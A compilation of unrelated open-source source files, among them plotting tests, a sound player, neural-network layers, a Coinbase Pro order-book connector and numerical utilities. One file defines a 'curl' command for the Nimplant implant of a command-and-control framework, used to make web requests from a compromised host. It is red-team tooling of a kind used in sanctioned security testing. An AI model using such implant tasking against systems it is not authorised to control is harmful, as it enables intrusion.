table["a"], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
numpy.testing.assert_array_equal(
table["b"], [0, 1, 4, 9, 16, 25, 36, 49, 64, 81])
@when(u'toyplot.data.Table is initialized with a sequence of name, column tuples')
def step_impl(context):
context.data = [("a", numpy.arange(10)), ("b", numpy.arange(10) ** 2)]
@when(u'toyplot.data.Table is initialized with a matrix')
def step_impl(context):
context.data = numpy.arange(16).reshape((4, 4))
@then(u'the toyplot.data.Table contains the matrix columns with generated keys')
def step_impl(context):
table = toyplot.data.Table(context.data)
nose.tools.assert_equal(list(table.keys()), ["0", "1", "2", "3"])
numpy.testing.assert_array_equal(
table["0"], [0, 4, 8, 12])
numpy.testing.assert_array_equal(
table["1"], [1, 5, 9, 13])
numpy.testing.assert_array_equal(
table["2"], [2, 6, 10, 14])
numpy.testing.assert_array_equal(
table["3"], [3, 7, 11, 15])
@when(u'toyplot.data.Table is initialized with an array')
def step_impl(context):
context.data = numpy.arange(16)
@when(u'toyplot.data.Table is initialized with an integer')
def step_impl(context):
context.data = 5
@then(u'the toyplot.data.Table raises ValueError')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
toyplot.data.Table(context.data)
@given(u'a toyplot.data.table with some data')
def step_impl(context):
numpy.random.seed(1234)
context.data = toyplot.data.Table()
context.data["foo"] = numpy.arange(10)
context.data["bar"] = numpy.random.random(10)
context.data["baz"] = numpy.random.choice(
["red", "green", "blue"], size=10)
@when(u'toyplot.data.Table is initialized with a csv file')
def step_impl(context):
context.data = toyplot.data.read_csv(toyplot.data.temperatures.path)
@then(u'the toyplot.data.Table contains the csv file columns')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (362, 6))
nose.tools.assert_equal(list(context.data.keys()), ['STATION', 'STATION_NAME', 'DATE', 'TMAX', 'TMIN', 'TOBS'])
for column in context.data.values():
nose.tools.assert_true(issubclass(column.dtype.type, numpy.character))
@when(u'toyplot.data.Table is initialized with a csv file and conversion')
def step_impl(context):
context.data = toyplot.data.read_csv(toyplot.data.temperatures.path, convert=True)
@then(u'the toyplot.data.Table contains the csv file columns with numeric type')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (362, 6))
nose.tools.assert_equal(list(context.data.keys()), ['STATION', 'STATION_NAME', 'DATE', 'TMAX', 'TMIN', 'TOBS'])
for column, column_type in zip(context.data.values(), [numpy.character, numpy.character, numpy.integer, numpy.integer, numpy.integer, numpy.integer]):
nose.tools.assert_true(issubclass(column.dtype.type, column_type))
@when(u'toyplot.data.Table is initialized with a pandas dataframe')
def step_impl(context):
if pandas_available(context):
context.data = toyplot.data.Table(pandas.read_csv(toyplot.data.temperatures.path))
@then(u'the toyplot.data.Table contains the data frame columns')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (362, 6))
nose.tools.assert_equal(list(context.data.keys()), ['STATION', 'STATION_NAME', 'DATE', 'TMAX', 'TMIN', 'TOBS'])
@when(u'toyplot.data.Table is initialized with a pandas dataframe with index')
def step_impl(context):
if pandas_available(context):
context.data = toyplot.data.Table(pandas.read_csv(toyplot.data.temperatures.path), index=True)
@then(u'the toyplot.data.Table contains the data frame columns plus an index column')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (362, 7))
nose.tools.assert_equal(list(context.data.keys()), ["index0", 'STATION', 'STATION_NAME', 'DATE', 'TMAX', 'TMIN', 'TOBS'])
@when(u'toyplot.data.Table is initialized with a pandas dataframe with hierarchical index')
def step_impl(context):
if pandas_available(context):
index = [numpy.array(["foo", "foo", "bar", "bar"]), numpy.array(["one", "two", "one", "two"])]
data_frame = pandas.DataFrame(numpy.ones((4, 4)), index=index)
context.data = toyplot.data.Table(data_frame, index=True)
@then(u'the toyplot.data.Table contains the data frame columns plus multiple index columns')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (4, 6))
nose.tools.assert_equal(list(context.data.keys()), ["index0", 'index1', '0', '1', '2', '3'])
@when(u'toyplot.data.Table is initialized with a pandas dataframe with hierarchical index and custom index format')
def step_impl(context):
if pandas_available(context):
index = [numpy.array(["foo", "foo", "bar", "bar"]), numpy.array(["one", "two", "one", "two"])]
data_frame = pandas.DataFrame(numpy.ones((4, 4)), index=index)
context.data = toyplot.data.Table(data_frame, index="Index {}")
@then(u'the toyplot.data.Table contains the data frame columns plus multiple custom format index columns')
def step_impl(context):
nose.tools.assert_equal(context.data.shape, (4, 6))
nose.tools.assert_equal(list(context.data.keys()), ["Index 0", 'Index 1', '0', '1', '2', '3'])
@when(u'toyplot.data.Table is initialized with a pandas dataframe with duplicate column names')
def step_impl(context):
if pandas_available(context):
context.data = toyplot.data.Table(pandas.read_csv(toyplot.data.temperatures.path)[["STATION", "DATE", "STATION", "DATE", "DATE"]])
@then(u'the toyplot.data.Table contains the data frame columns with uniqified column names')
def step_impl(context):
nose.tools.assert_equal(list(context.data.keys()), ['STATION', 'DATE', 'STATION-1', 'DATE-1', 'DATE-2'])
@then(u'the table can be rendered as format ipython html string')
def step_impl(context):
html = context.data._repr_html_()
nose.tools.assert_is_instance(html, str)
testing.assert_html_equal(html, "data-table")
|
pydoro/pydoro_core/sound.py | Liupold/pydoro | 403 | 12716633 | """
This file was copied from
https://github.com/TaylorSMarks/playsound
playsound.py - For playing audio file, Copyright (c) 2016 <NAME>
MIT License
----
I've added async play for linux using a thread, changed names to be more pythonic
I've also added a thin wrapper around pygame as well
"""
from platform import system
system = system()
class PlayException(Exception):
pass
def _play_sound_win(sound, block=True):
"""
Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on
Windows 7 with Python 2.7. Probably works with more file formats.
Probably works on Windows XP thru Windows 10. Probably works with all
versions of Python.
Inspired by (but not copied from) <NAME> <<EMAIL>>'s mp3play:
https://github.com/michaelgundlach/mp3play
I never would have tried using windll.winmm without seeing his code.
"""
from ctypes import c_buffer, windll
from random import random
from time import sleep
from sys import getfilesystemencoding
def win_cmd(*command):
buf = c_buffer(255)
command = " ".join(command).encode(getfilesystemencoding())
err_code = int(windll.winmm.mciSendStringA(command, buf, 254, 0))
if err_code:
error_buffer = c_buffer(255)
windll.winmm.mciGetErrorStringA(err_code, error_buffer, 254)
exception_message = (
"\n Error " + str(err_code) + " for command:"
"\n " + command.decode() + "\n " + error_buffer.value.decode()
)
raise PlayException(exception_message)
return buf.value
alias = "playsound_" + str(random())
win_cmd('open "' + sound + '" alias', alias)
win_cmd("set", alias, "time format milliseconds")
duration_ms = win_cmd("status", alias, "length")
win_cmd("play", alias, "from 0 to", duration_ms.decode())
if block:
sleep(float(duration_ms) / 1000.0)
def _play_sound_osx(sound, block=True):
"""
Utilizes AppKit.NSSound. Tested and known to work with MP3 and WAVE on
OS X 10.11 with Python 2.7. Probably works with anything QuickTime supports.
Probably works on OS X 10.5 and newer. Probably works with all versions of
Python.
Inspired by (but not copied from) Aaron's Stack Overflow answer here:
http://stackoverflow.com/a/34568298/901641
I never would have tried using AppKit.NSSound without seeing his code.
"""
from AppKit import NSSound
from Foundation import NSURL
from time import sleep
if "://" not in sound:
if not sound.startswith("/"):
from os import getcwd
sound = getcwd() + "/" + sound
sound = "file://" + sound
url = NSURL.URLWithString_(sound)
nssound = NSSound.alloc().initWithContentsOfURL_byReference_(url, True)
if not nssound:
raise IOError("Unable to load sound named: " + sound)
nssound.play()
if block:
sleep(nssound.duration())
def _play_sound_nix_blocking(sound):
"""Play a sound using GStreamer.
Inspired by this:
https://gstreamer.freedesktop.org/documentation/tutorials/playback/playbin-usage.html
"""
# pathname2url escapes non-URL-safe characters
import os
try:
from urllib.request import pathname2url
except ImportError:
# python 2
from urllib import pathname2url
import gi
gi.require_version("Gst", "1.0")
from gi.repository import Gst
Gst.init(None)
playbin = Gst.ElementFactory.make("playbin", "playbin")
if sound.startswith(("http://", "https://")):
playbin.props.uri = sound
else:
playbin.props.uri = "file://" + pathname2url(os.path.abspath(sound))
set_result = playbin.set_state(Gst.State.PLAYING)
if set_result != Gst.StateChangeReturn.ASYNC:
raise PlayException("playbin.set_state returned " + repr(set_result))
bus = playbin.get_bus()
bus.poll(Gst.MessageType.EOS, Gst.CLOCK_TIME_NONE)
playbin.set_state(Gst.State.NULL)
def _play_sound_nix_no_except(sound):
# noinspection PyBroadException
try:
_play_sound_nix(sound)
except:
pass
def _play_sound_nix(sound, block=True):
if block:
_play_sound_nix_blocking(sound)
return
from threading import Thread
thread = Thread(target=_play_sound_nix_no_except, args=(sound,), daemon=True)
thread.start()
def _play_sound_pygame_blocking(sound):
from pygame import mixer
import time
mixer.init()
mixer.music.load(sound)
mixer.music.play()
while mixer.music.get_busy():
time.sleep(0.1)
def _play_sound_pygame(sound, block=True):
if block:
_play_sound_pygame_blocking(sound)
return
from threading import Thread
thread = Thread(target=_play_sound_pygame_blocking, args=(sound,), daemon=True)
thread.start()
if system == "Windows":
play = _play_sound_win
elif system == "Darwin":
play = _play_sound_osx
else:
# For linux this will try following libraries
# 1) if pygame can be imported use it
# 2) if pygame cannot be imported use PyGObject
try:
import pygame as try_pygame
play = _play_sound_pygame
del try_pygame
except ImportError:
play = _play_sound_nix
del system
|
fastreid/layers/activation.py | tenghehan/reid_without_id | 2,194 | 12716719 | # encoding: utf-8
"""
@author: <NAME>
@contact: <EMAIL>
"""
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = [
'Mish',
'Swish',
'MemoryEfficientSwish',
'GELU']
class Mish(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
# inlining this saves 1 second per epoch (V100 GPU) vs having a temp x and then returning x(!)
return x * (torch.tanh(F.softplus(x)))
class Swish(nn.Module):
def forward(self, x):
return x * torch.sigmoid(x)
class SwishImplementation(torch.autograd.Function):
@staticmethod
def forward(ctx, i):
result = i * torch.sigmoid(i)
ctx.save_for_backward(i)
return result
@staticmethod
def backward(ctx, grad_output):
i = ctx.saved_variables[0]
sigmoid_i = torch.sigmoid(i)
return grad_output * (sigmoid_i * (1 + i * (1 - sigmoid_i)))
class MemoryEfficientSwish(nn.Module):
def forward(self, x):
return SwishImplementation.apply(x)
class GELU(nn.Module):
"""
Paper Section 3.4, last paragraph notice that BERT used the GELU instead of RELU
"""
def forward(self, x):
return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
|
test_network_tensorflow.py | lFatality/tensorflow2caffe | 115 | 12716732 | <gh_stars>100-1000
import numpy as np
import cv2
from model import vgg_net_19, vgg_net_19_activations
MODEL_SAVE_PATH = 'vgg_net_19.model'
IMG_NAME = 'test_img.png'
WIDTH = 112
HEIGHT = 112
#for testing a vector output
def test_model_vector_output():
#load architecture and parameters
model = vgg_net_19(WIDTH, HEIGHT)
model.load(MODEL_SAVE_PATH)
#load image, add batch size and predict
image = cv2.imread(IMG_NAME)
image = image.reshape(1, HEIGHT, WIDTH, 3)
output = model.predict(image)
print(output)
#for testing a tensor output (will output caffe format)
def test_model_tensor_output():
#load architecture and parameters
model = vgg_net_19_activations(WIDTH, HEIGHT)
model.load(MODEL_SAVE_PATH)
#load image, add batch size and predict
image = cv2.imread(IMG_NAME)
image = image.reshape(1, HEIGHT, WIDTH, 3)
output = model.predict(image)
#conversion to caffe format
#output format tensor:
#Tensorflow: [batch size (0), height (1), width (2), depth (3)]
#Caffe: [batch size (0), depth (3), height (1), width (2)]
output = output.transpose((0,3,1,2))
print(output)
#test_model_vector_output()
test_model_tensor_output() |
Maximum_Subarray/Python/shivam5992/kadane.py | Mynogs/Algorithm-Implementations | 1,184 | 12716742 | <filename>Maximum_Subarray/Python/shivam5992/kadane.py
from random import shuffle
'''
The maximum subarray problem is the task of finding the contiguous subarray within a
1D array of numbers (containing at least one positive number) which has the largest sum.
following implementation is the Dynamic Programming Approach
Time Complexity is O(n)
'''
def kadane(arr):
size = len(arr)
curr_max = arr[0]
max_so_far = arr[0]
for i in range(1, size):
curr_max = max(curr_max+arr[i],arr[i])
max_so_far = max(curr_max,max_so_far)
return max_so_far
if __name__ == '__main__':
array = list(range(10, -10, -1))
shuffle(array)
print "List: " + str(array)
print "Maximum Sum of SubArrays: "
response = kadane(array)
print response
|
tests/engine/test_engine.py | hanqiu-hq/cvpods | 758 | 12716749 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
import torch
from torch import nn
from cvpods.engine import SimpleRunner
from torch.utils.data import Dataset
class SimpleDataset(Dataset):
def __init__(self, length=100):
self.data_list = torch.rand(length, 3, 3)
def __getitem__(self, index):
return self.data_list[index]
class SimpleModel(nn.Sequential):
def forward(self, x):
return {"loss": x.sum() + sum([x.mean() for x in self.parameters()])}
class TestTrainer(unittest.TestCase):
def test_simple_trainer(self, device="cpu"):
device = torch.device(device)
model = SimpleModel(nn.Linear(10, 10)).to(device)
class DataLoader:
def __len__(self):
return 10000
def __iter__(self):
while True:
yield torch.rand(3, 3).to(device)
trainer = SimpleRunner(model, DataLoader(), torch.optim.SGD(model.parameters(), 0.1))
trainer.max_epoch = None
trainer.train(0, 0, 10)
return trainer
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_simple_trainer_cuda(self):
self.test_simple_trainer(device="cuda")
|
neo/Network/flightinfo.py | volekerb/neo-python | 387 | 12716847 | from datetime import datetime
class FlightInfo:
def __init__(self, node_id, height):
self.node_id: int = node_id
self.height: int = height
self.start_time: int = datetime.utcnow().timestamp()
def reset_start_time(self):
self.start_time = datetime.utcnow().timestamp()
|
quaternion/setup3d.py | IhorNehrutsa/micropython-samples | 268 | 12716849 | <reponame>IhorNehrutsa/micropython-samples
# setup3d.py
# Hardware specific setup for 3D demos
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2020 <NAME>
from machine import I2C, SPI, Pin
import gc
# This module must export the following functions
# fill(color) Fill the buffer with a color
# line(xs, ys, xe, ye, color) Draw a line to the buffer
# show() Display result
# Also dimension bound variable.
from ssd1351_16bit import SSD1351 as SSD
_HEIGHT = const(128) # SSD1351 variant in use
# IMU driver for test_imu only. With other IMU's the fusion module
# may be used for quaternion output.
# https://github.com/micropython-IMU/micropython-fusion
from bno055 import BNO055
# Initialise IMU
i2c = I2C(2)
imu = BNO055(i2c)
# Export color constants
WHITE = SSD.rgb(255, 255, 255)
GREY = SSD.rgb(100, 100, 100)
GREEN = SSD.rgb(0, 255, 0)
BLUE = SSD.rgb(0, 0, 255)
RED = SSD.rgb(255, 0, 0)
YELLOW = SSD.rgb(255, 255, 0)
CYAN = SSD.rgb(0, 255, 255)
# Initialise display
# Monkey patch size of square viewing area. No. of pixels for a change of 1.0
# Viewing area is 128*128
DIMENSION = 64
gc.collect()
_pdc = Pin('X1', Pin.OUT_PP, value=0) # Pins are for Pyboard
_pcs = Pin('X2', Pin.OUT_PP, value=1)
_prst = Pin('X3', Pin.OUT_PP, value=1)
_spi = SPI(2) # scl Y9 sda Y10
_ssd = SSD(_spi, _pcs, _pdc, _prst, height=_HEIGHT) # Create a display instance
line = _ssd.line
fill = _ssd.fill
show = _ssd.show
def setup():
return _ssd
|
banpei/utils.py | Mee-Panyar-Clinic/banpei | 274 | 12716857 | <reponame>Mee-Panyar-Clinic/banpei
import numpy as np
def power_method(A, iter_num=1):
"""
Calculate the first singular vector/value of a target matrix based on the power method.
Parameters
----------
A : numpy array
Target matrix
iter_num : int
Number of iterations
Returns
-------
u : numpy array
first left singular vector of A
s : float
first singular value of A
v : numpy array
first right singular vector of A
"""
# set initial vector q
q = np.random.normal(size=A.shape[1])
q = q / np.linalg.norm(q)
for i in range(iter_num):
q = np.dot(np.dot(A.T, A), q)
v = q / np.linalg.norm(q)
Av = np.dot(A, v)
s = np.linalg.norm(Av)
u = Av / s
return u, s, v
def tridiagonalize_by_lanczos(P, m, k):
"""
Tridiagonalize matrix by lanczos method
Parameters
----------
P : numpy array
Target matrix
q : numpy array
Initial vector
k : int
Size of the tridiagonal matrix
Returns
-------
T : numpy array
tridiagonal matrix
"""
# Initialize variables
T = np.zeros((k, k))
r0 = m
beta0 = 1
q0 = np.zeros(m.shape)
for i in range(k):
q1 = r0 / beta0
C = np.dot(P, q1)
alpha1 = np.dot(q1, C)
r1 = C - alpha1 * q1 - beta0 * q0
beta1 = np.linalg.norm(r1)
T[i, i] = alpha1
if i + 1 < k:
T[i, i + 1] = beta1
T[i + 1, i] = beta1
q0 = q1
beta0 = beta1
r0 = r1
return T
def tridiag_eigen(T, iter_num=1, tol=1e-3):
"""
Calculate eigenvalues and eigenvectors of tridiagonal matrix
Parameters
----------
P : numpy array
Target matrix (tridiagonal)
iter_num : int
Number of iterations
tol : float
Stop iteration if the target matrix converges to a diagonal matrix with acceptable tolerance `tol`
Returns
-------
eigenvalue : numpy array
Calculated eigenvalues
eigenvectors : numpy array
Calculated eigenvectors
"""
eigenvectors = np.identity(T.shape[0])
for i in range(iter_num):
Q, R = tridiag_qr_decomposition(T)
T = np.dot(R, Q)
eigenvectors = np.dot(eigenvectors, Q)
eigenvalue = np.diag(T)
if np.all((T - np.diag(eigenvalue) < tol)):
break
return eigenvalue, eigenvectors
def tridiag_qr_decomposition(T):
"""
QR decomposition for a tridiagonal matrix
Ref. http://www.ericmart.in/blog/optimizing_julia_tridiag_qr
Parameters
----------
T : numpy array
Target matrix (tridiagonal)
Returns
-------
Qt.T : numpy array
R : numpy array
"""
R = T.copy()
Qt = np.eye(T.shape[0])
for i in range(T.shape[0] - 1):
u = householder(R[i:i + 2, i])
M = np.outer(u, u)
R[i:i + 2, :(i + 3)] -= 2 * np.dot(M, R[i:i + 2, :(i + 3)])
Qt[i:i + 2, :(i + 3)] -= 2 * np.dot(M, Qt[i:i + 2, :(i + 3)])
return Qt.T, R
def householder(x):
"""
Householder projection for vector.
Parameters
----------
x : numpy array
Target vector
Returns
-------
x : numpy array
"""
x[0] = x[0] + np.sign(x[0]) * np.linalg.norm(x)
x = x / np.linalg.norm(x)
return x
|
hummingbot/connector/exchange/coinbase_pro/coinbase_pro_api_order_book_data_source.py | BGTCapital/hummingbot | 3,027 | 12716873 | #!/usr/bin/env python
import asyncio
import logging
import time
from decimal import Decimal
from typing import AsyncIterable, Dict, List, Optional
import pandas as pd
from hummingbot.connector.exchange.coinbase_pro import coinbase_pro_constants as CONSTANTS
from hummingbot.connector.exchange.coinbase_pro.coinbase_pro_active_order_tracker import CoinbaseProActiveOrderTracker
from hummingbot.connector.exchange.coinbase_pro.coinbase_pro_order_book import CoinbaseProOrderBook
from hummingbot.connector.exchange.coinbase_pro.coinbase_pro_order_book_tracker_entry import (
CoinbaseProOrderBookTrackerEntry
)
from hummingbot.connector.exchange.coinbase_pro.coinbase_pro_utils import (
CoinbaseProRESTRequest,
build_coinbase_pro_web_assistant_factory
)
from hummingbot.core.data_type.order_book import OrderBook
from hummingbot.core.data_type.order_book_message import OrderBookMessage
from hummingbot.core.data_type.order_book_tracker_data_source import OrderBookTrackerDataSource
from hummingbot.core.data_type.order_book_tracker_entry import OrderBookTrackerEntry
from hummingbot.core.utils.async_utils import safe_gather
from hummingbot.core.web_assistant.connections.data_types import RESTMethod, WSRequest
from hummingbot.core.web_assistant.rest_assistant import RESTAssistant
from hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory
from hummingbot.core.web_assistant.ws_assistant import WSAssistant
from hummingbot.logger import HummingbotLogger
MAX_RETRIES = 20
NaN = float("nan")
class CoinbaseProAPIOrderBookDataSource(OrderBookTrackerDataSource):
MESSAGE_TIMEOUT = 30.0
PING_TIMEOUT = 10.0
_cbpaobds_logger: Optional[HummingbotLogger] = None
_shared_web_assistants_factory: Optional[WebAssistantsFactory] = None
@classmethod
def logger(cls) -> HummingbotLogger:
if cls._cbpaobds_logger is None:
cls._cbpaobds_logger = logging.getLogger(__name__)
return cls._cbpaobds_logger
def __init__(
self,
trading_pairs: Optional[List[str]] = None,
web_assistants_factory: Optional[WebAssistantsFactory] = None,
):
super().__init__(trading_pairs)
self._web_assistants_factory = web_assistants_factory or build_coinbase_pro_web_assistant_factory()
self._rest_assistant = None
@classmethod
async def get_last_traded_prices(cls, trading_pairs: List[str]) -> Dict[str, Decimal]:
tasks = [cls.get_last_traded_price(t_pair) for t_pair in trading_pairs]
results = await safe_gather(*tasks)
return {t_pair: result for t_pair, result in zip(trading_pairs, results)}
@classmethod
async def get_last_traded_price(cls, trading_pair: str) -> Decimal:
factory = build_coinbase_pro_web_assistant_factory()
rest_assistant = await factory.get_rest_assistant()
endpoint = f"{CONSTANTS.PRODUCTS_PATH_URL}/{trading_pair}/ticker"
request = CoinbaseProRESTRequest(RESTMethod.GET, endpoint=endpoint)
response = await rest_assistant.call(request)
resp_json = await response.json()
return Decimal(resp_json["price"])
@staticmethod
async def fetch_trading_pairs() -> List[str]:
trading_pair_list = []
try:
factory = build_coinbase_pro_web_assistant_factory()
rest_assistant = await factory.get_rest_assistant()
request = CoinbaseProRESTRequest(RESTMethod.GET, endpoint=CONSTANTS.PRODUCTS_PATH_URL)
response = await rest_assistant.call(request)
if response.status == 200:
markets = await response.json()
raw_trading_pairs: List[str] = list(map(lambda details: details.get('id'), markets))
trading_pair_list: List[str] = []
for raw_trading_pair in raw_trading_pairs:
trading_pair_list.append(raw_trading_pair)
except Exception:
# Do nothing if the request fails -- there will be no autocomplete for coinbase trading pairs
pass
return trading_pair_list
@staticmethod
async def get_snapshot(rest_assistant: RESTAssistant, trading_pair: str) -> Dict[str, any]:
"""
Fetches order book snapshot for a particular trading pair from the rest API
:returns: Response from the rest API
"""
endpoint = f"{CONSTANTS.PRODUCTS_PATH_URL}/{trading_pair}/book?level=3"
request = CoinbaseProRESTRequest(RESTMethod.GET, endpoint=endpoint)
response = await rest_assistant.call(request)
if response.status != 200:
raise IOError(f"Error fetching Coinbase Pro market snapshot for {trading_pair}. "
f"HTTP status is {response.status}.")
response_data = await response.json()
return response_data
async def get_new_order_book(self, trading_pair: str) -> OrderBook:
rest_assistant = await self._get_rest_assistant()
snapshot: Dict[str, any] = await self.get_snapshot(rest_assistant, trading_pair)
snapshot_timestamp: float = time.time()
snapshot_msg: OrderBookMessage = CoinbaseProOrderBook.snapshot_message_from_exchange(
snapshot,
snapshot_timestamp,
metadata={"trading_pair": trading_pair}
)
active_order_tracker: CoinbaseProActiveOrderTracker = CoinbaseProActiveOrderTracker()
bids, asks = active_order_tracker.convert_snapshot_message_to_order_book_row(snapshot_msg)
order_book = self.order_book_create_function()
order_book.apply_snapshot(bids, asks, snapshot_msg.update_id)
return order_book
async def get_tracking_pairs(self) -> Dict[str, OrderBookTrackerEntry]:
"""
*required
Initializes order books and order book trackers for the list of trading pairs
returned by `self.get_trading_pairs`
:returns: A dictionary of order book trackers for each trading pair
"""
# Get the currently active markets
trading_pairs: List[str] = self._trading_pairs
retval: Dict[str, OrderBookTrackerEntry] = {}
rest_assistant = await self._get_rest_assistant()
number_of_pairs: int = len(trading_pairs)
for index, trading_pair in enumerate(trading_pairs):
try:
snapshot: Dict[str, any] = await self.get_snapshot(rest_assistant, trading_pair)
snapshot_timestamp: float = time.time()
snapshot_msg: OrderBookMessage = CoinbaseProOrderBook.snapshot_message_from_exchange(
snapshot,
snapshot_timestamp,
metadata={"trading_pair": trading_pair}
)
order_book: OrderBook = self.order_book_create_function()
active_order_tracker: CoinbaseProActiveOrderTracker = CoinbaseProActiveOrderTracker()
bids, asks = active_order_tracker.convert_snapshot_message_to_order_book_row(snapshot_msg)
order_book.apply_snapshot(bids, asks, snapshot_msg.update_id)
retval[trading_pair] = CoinbaseProOrderBookTrackerEntry(
trading_pair,
snapshot_timestamp,
order_book,
active_order_tracker
)
self.logger().info(f"Initialized order book for {trading_pair}. "
f"{index+1}/{number_of_pairs} completed.")
await self._sleep(0.6)
except IOError:
self.logger().network(
f"Error getting snapshot for {trading_pair}.",
exc_info=True,
app_warning_msg=f"Error getting snapshot for {trading_pair}. Check network connection."
)
except Exception:
self.logger().error(f"Error initializing order book for {trading_pair}. ", exc_info=True)
return retval
async def _iter_messages(self, ws: WSAssistant) -> AsyncIterable[Dict]:
"""
Generator function that returns messages from the web socket stream
:param ws: current web socket connection
:returns: message in AsyncIterable format
"""
# Terminate the recv() loop as soon as the next message timed out, so the outer loop can reconnect.
try:
async for response in ws.iter_messages():
msg = response.data
yield msg
except asyncio.TimeoutError:
self.logger().warning("WebSocket ping timed out. Going to reconnect...")
finally:
await ws.disconnect()
async def listen_for_trades(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):
# Trade messages are received from the order book web socket
pass
async def listen_for_order_book_diffs(self, ev_loop: asyncio.AbstractEventLoop, output: asyncio.Queue):
"""
*required
Subscribe to diff channel via web socket, and keep the connection open for incoming messages
:param ev_loop: ev_loop to execute this function in
:param output: an async queue where the incoming messages are stored
"""
while True:
try:
trading_pairs: List[str] = self._trading_pairs
ws_assistant = await self._web_assistants_factory.get_ws_assistant()
await ws_assistant.connect(CONSTANTS.WS_URL, message_timeout=CONSTANTS.WS_MESSAGE_TIMEOUT)
subscribe_payload = {
"type": "subscribe",
"product_ids": trading_pairs,
"channels": [CONSTANTS.FULL_CHANNEL_NAME]
}
subscribe_request = WSRequest(payload=subscribe_payload)
await ws_assistant.subscribe(subscribe_request)
async for msg in self._iter_messages(ws_assistant):
msg_type: str = msg.get("type", None)
if msg_type is None:
raise ValueError(f"Coinbase Pro Websocket message does not contain a type - {msg}")
elif msg_type == "error":
raise ValueError(f"Coinbase Pro Websocket received error message - {msg['message']}")
elif msg_type in ["open", "match", "change", "done"]:
if msg_type == "done" and "price" not in msg:
# done messages with no price are completed market orders which can be ignored
continue
order_book_message: OrderBookMessage = CoinbaseProOrderBook.diff_message_from_exchange(msg)
output.put_nowait(order_book_message)
elif msg_type in ["received", "activate", "subscriptions"]:
# these messages are not needed to track the order book
continue
else:
raise ValueError(f"Unrecognized Coinbase Pro Websocket message received - {msg}")
except asyncio.CancelledError:
raise
except Exception:
self.logger().network(
"Unexpected error with WebSocket connection.",
exc_info=True,
app_warning_msg=f"Unexpected error with WebSocket connection."
f" Retrying in {CONSTANTS.REST_API_LIMIT_COOLDOWN} seconds."
f" Check network connection."
)
await self._sleep(CONSTANTS.WS_RECONNECT_COOLDOWN)
async def listen_for_order_book_snapshots(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):
"""
*required
Fetches order book snapshots for each trading pair, and use them to update the local order book
:param ev_loop: ev_loop to execute this function in
:param output: an async queue where the incoming messages are stored
"""
while True:
try:
trading_pairs: List[str] = self._trading_pairs
rest_assistant = await self._get_rest_assistant()
for trading_pair in trading_pairs:
try:
snapshot: Dict[str, any] = await self.get_snapshot(rest_assistant, trading_pair)
snapshot_timestamp: float = time.time()
snapshot_msg: OrderBookMessage = CoinbaseProOrderBook.snapshot_message_from_exchange(
snapshot,
snapshot_timestamp,
metadata={"product_id": trading_pair}
)
output.put_nowait(snapshot_msg)
self.logger().debug(f"Saved order book snapshot for {trading_pair}")
# Be careful not to go above API rate limits.
await self._sleep(CONSTANTS.REST_API_LIMIT_COOLDOWN)
except asyncio.CancelledError:
raise
except Exception:
self.logger().network(
"Unexpected error with WebSocket connection.",
exc_info=True,
app_warning_msg=f"Unexpected error with WebSocket connection."
f" Retrying in {CONSTANTS.REST_API_LIMIT_COOLDOWN} seconds."
f" Check network connection."
)
await self._sleep(CONSTANTS.REST_API_LIMIT_COOLDOWN)
this_hour: pd.Timestamp = pd.Timestamp.utcnow().replace(minute=0, second=0, microsecond=0)
next_hour: pd.Timestamp = this_hour + pd.Timedelta(hours=1)
delta: float = next_hour.timestamp() - time.time()
await self._sleep(delta)
except asyncio.CancelledError:
raise
except Exception:
self.logger().error("Unexpected error.", exc_info=True)
await self._sleep(CONSTANTS.REST_API_LIMIT_COOLDOWN)
async def _sleep(self, delay: float):
await asyncio.sleep(delay)
async def _get_rest_assistant(self) -> RESTAssistant:
if self._rest_assistant is None:
self._rest_assistant = await self._web_assistants_factory.get_rest_assistant()
return self._rest_assistant
|
emails/admin.py | Jordzman/explorer | 917 | 12716879 | <filename>emails/admin.py
from django.contrib import admin
from emails.models import SentEmail
class SentEmailAdmin(admin.ModelAdmin):
list_display = (
'id',
'sent_at',
'from_email',
'from_name',
'to_email',
'to_name',
'body_template',
'subject',
'auth_user',
'address_subscription',
'transaction_event',
'address_forwarding',
)
list_filter = ('body_template', )
raw_id_fields = ('auth_user', 'address_subscription', 'transaction_event', 'address_forwarding', )
class Meta:
model = SentEmail
admin.site.register(SentEmail, SentEmailAdmin)
|
Payload_Type/Nimplant/mythic/agent_functions/curl.py | cybernomad1/Nimplant | 152 | 12716880 | <gh_stars>100-1000
from CommandBase import *
import json
class CurlArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {
"url": CommandParameter(
name="url",
type=ParameterType.String,
description="URL to request.",
default_value="https://www.google.com",
),
"method": CommandParameter(
name="method",
type=ParameterType.ChooseOne,
description="Type of request",
choices=["GET", "POST"],
),
"headers": CommandParameter(
name="headers",
type=ParameterType.String,
description="base64 encoded json with headers.",
required=False,
),
"body": CommandParameter(
name="body",
type=ParameterType.String,
description="base64 encoded body.",
required=False,
),
}
async def parse_arguments(self):
self.load_args_from_json_string(self.command_line)
class CurlCommand(CommandBase):
cmd = "curl"
needs_admin = False
help_cmd = 'curl { "url": "https://www.google.com", "method": "GET", "headers": "", "body": "" }'
description = "Execute a single web request."
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_remove_file = False
is_upload_file = False
author = "@NotoriousRebel"
argument_class = CurlArguments
attackmapping = []
async def create_tasking(self, task: MythicTask) -> MythicTask:
return task
async def process_response(self, response: AgentResponse):
pass
|
chainerrl/misc/init_like_torch.py | ConnectionMaster/chainerrl | 923 | 12716889 | <reponame>ConnectionMaster/chainerrl
from chainer import links as L
import numpy as np
